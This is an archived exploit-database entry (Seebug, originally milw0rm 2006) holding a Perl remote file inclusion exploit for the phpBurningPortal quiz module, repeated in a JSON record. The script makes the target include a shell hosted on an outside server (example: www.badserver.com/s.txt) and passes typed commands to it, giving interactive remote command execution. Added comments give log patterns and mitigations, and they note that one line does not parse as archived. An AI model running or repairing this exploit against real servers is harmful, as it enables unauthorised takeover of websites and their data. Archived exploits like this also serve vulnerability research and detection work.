ID SSV:64118
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00
Description
No description provided by source.
#!/usr/bin/perl
use LWP::UserAgent;
use LWP::Simple;
# Archived proof-of-concept for the phpBurningPortal quiz module (<= 1.0.1)
# `lang_path` remote file inclusion. This top-level section reads its
# arguments, picks one of three module scripts, then sends one GET request
# per line typed on STDIN.
#
# Defender notes:
#   - Requests to /modules/includes/quest_delete.php, quest_edit.php or
#     quest_news.php whose `lang_path` query parameter carries a URL are the
#     pattern this script produces; that is what to look for in web logs.
#   - Mitigation is on the PHP side: do not build include paths from request
#     parameters, and keep allow_url_include / allow_url_fopen disabled.
#   - NOTE(review): the script has no `use strict` / `use warnings`, and every
#     variable below is a package global.

# Positional arguments. `@ARGV[n]` is a one-element array slice; it yields the
# same value as `$ARGV[n]` here, but the scalar form is the conventional one.
$target = @ARGV[0];
$shellsite = @ARGV[1];
$shellcmd = @ARGV[2];
$fileno = @ARGV[3];
# Only the first two arguments are checked; usage() prints help and exits.
if(!$target || !$shellsite)
{
usage();
}
header();
# Choose the module script to request. `eq` is a string comparison, so the
# argument must be exactly "1", "2" or "3"; anything else (including a missing
# argument) falls through to the same script as option 1.
if ($fileno eq 1)
{
$file = "quest_delete.php?lang_path=";
}
elsif ($fileno eq 2)
{
$file = "quest_edit.php?lang_path=";
}
elsif ($fileno eq 3)
{
$file = "quest_news.php?lang_path=";
}
else
{
$file = "quest_delete.php?lang_path=";
}
print "[cmd]\$";
$cmd = <STDIN>;
# The loop condition is an unanchored pattern match: any input line that
# contains "exit" anywhere ends the loop, not only the bare word.
while ($cmd !~ "exit")
{
$xpl = LWP::UserAgent->new() or die;
# NOTE(review): as archived, the statement below does not parse as Perl; the
# listing is kept verbatim. Constructing an HTTP::Request performs no network
# I/O, so the "Failed to connect" message would not report a connection
# failure; the status of the response in $res is never checked either.
$req =
HTTP::Request->new(GET=>$target'/modules/includes/'.$file.$shellsite.'?&'.$shellcmd.'='.$cmd)
or die("\n\n Failed to connect.");
$res = $xpl->request($req);
$r = $res->content;
# tr/// is a character map, not a regex: the brackets are literal characters
# mapped to themselves, and each newline in the body is replaced by "ê".
$r =~ tr/[\n]/[ê]/;
# The response body is shown only when the fifth argument is exactly "-r".
if (@ARGV[4] eq "-r")
{
print $r;
}
print "[cmd]\$";
$cmd = <STDIN>;
}
# Print the proof-of-concept's identification banner to the currently
# selected output handle. Takes no arguments.
sub header()
{
    # Single-quoted literal: nothing inside is interpolated.
    my $banner = q{
########################################################################
phpBurningPortal quiz-modul-1.0.1 - Remote File Include Exploit
Vulnerability discovered and exploit by r0ut3r
writ3r@gmail.com
For portal administrator testing purposes only!
########################################################################
};
    print $banner;
}
# Print the banner followed by the command-line help, then terminate the
# program. Called when the required arguments are missing; never returns.
sub usage()
{
    header();
    # Single-quoted literal: nothing inside is interpolated.
    my $help = q{
########################################################################
Usage:
perl q_xpl.pl <Target website> <Shell Location> <CMD Variable> <No> <r>
<Target Website> - Path to target eg: www.qvuln.target.com
<Shell Location> - Path to shell eg: www.badserver.com/s.txt
<CMD Variable> - Shell command variable name eg: cmd
<No> - File number, corresponding to:
1: quest_delete.php
2: quest_edit.php
3: quest_news.php
<r> - Show output from shell
Example:
perl a.pl http://localhost http://localhost/s.txt cmd 1 -r
########################################################################
};
    print $help;
    exit();
}
# milw0rm.com [2006-10-15]
{"href": "https://www.seebug.org/vuldb/ssvid-64118", "status": "cve,poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "phpBurningPortal <= 1.0.1 (lang_path) Remote File Include Exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-64118", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2014-07-01T00:00:00", "sourceData": "\n #!/usr/bin/perl\r\n\r\nuse LWP::UserAgent;\r\nuse LWP::Simple;\r\n\r\n$target = @ARGV[0];\r\n$shellsite = @ARGV[1];\r\n$shellcmd = @ARGV[2];\r\n$fileno = @ARGV[3];\r\n\r\nif(!$target || !$shellsite)\r\n{\r\n usage();\r\n}\r\n\r\nheader();\r\n\r\nif ($fileno eq 1)\r\n{\r\n $file = "quest_delete.php?lang_path=";\r\n}\r\nelsif ($fileno eq 2)\r\n{\r\n $file = "quest_edit.php?lang_path=";\r\n}\r\nelsif ($fileno eq 3)\r\n{\r\n $file = "quest_news.php?lang_path=";\r\n}\r\nelse\r\n{\r\n $file = "quest_delete.php?lang_path=";\r\n}\r\n\r\nprint "[cmd]\\$";\r\n$cmd = <STDIN>;\r\n\r\nwhile ($cmd !~ "exit")\r\n{\r\n $xpl = LWP::UserAgent->new() or die;\r\n $req =\r\nHTTP::Request->new(GET=>$target'/modules/includes/'.$file.$shellsite.'?&'.$shellcmd.'='.$cmd)\r\nor die("\\n\\n Failed to connect.");\r\n $res = $xpl->request($req);\r\n $r = $res->content;\r\n $r =~ tr/[\\n]/[ê]/;\r\n\r\n if (@ARGV[4] eq "-r")\r\n {\r\n print $r;\r\n }\r\n\r\n print "[cmd]\\$";\r\n $cmd = <STDIN>;\r\n}\r\n\r\nsub header()\r\n{\r\n print q\r\n {\r\n########################################################################\r\n phpBurningPortal quiz-modul-1.0.1 - Remote File Include Exploit\r\n Vulnerability discovered and exploit by r0ut3r\r\n writ3r@gmail.com\r\n For portal administrator testing purposes only!\r\n########################################################################\r\n };\r\n}\r\n\r\nsub usage()\r\n{\r\nheader();\r\n print q\r\n {\r\n########################################################################\r\nUsage:\r\nperl q_xpl.pl 
<Target website> <Shell Location> <CMD Variable> <No> <r>\r\n<Target Website> - Path to target eg: www.qvuln.target.com\r\n<Shell Location> - Path to shell eg: www.badserver.com/s.txt\r\n<CMD Variable> - Shell command variable name eg: cmd\r\n<No> - File number, corresponding to:\r\n1: quest_delete.php\r\n2: quest_edit.php\r\n3: quest_news.php\r\n<r> - Show output from shell\r\nExample:\r\nperl a.pl http://localhost http://localhost/s.txt cmd 1 -r\r\n########################################################################\r\n };\r\nexit();\r\n}\r\n\r\n# milw0rm.com [2006-10-15]\r\n\n ", "id": "SSV:64118", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T15:16:50", "reporter": "Root", "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645568899}}
{}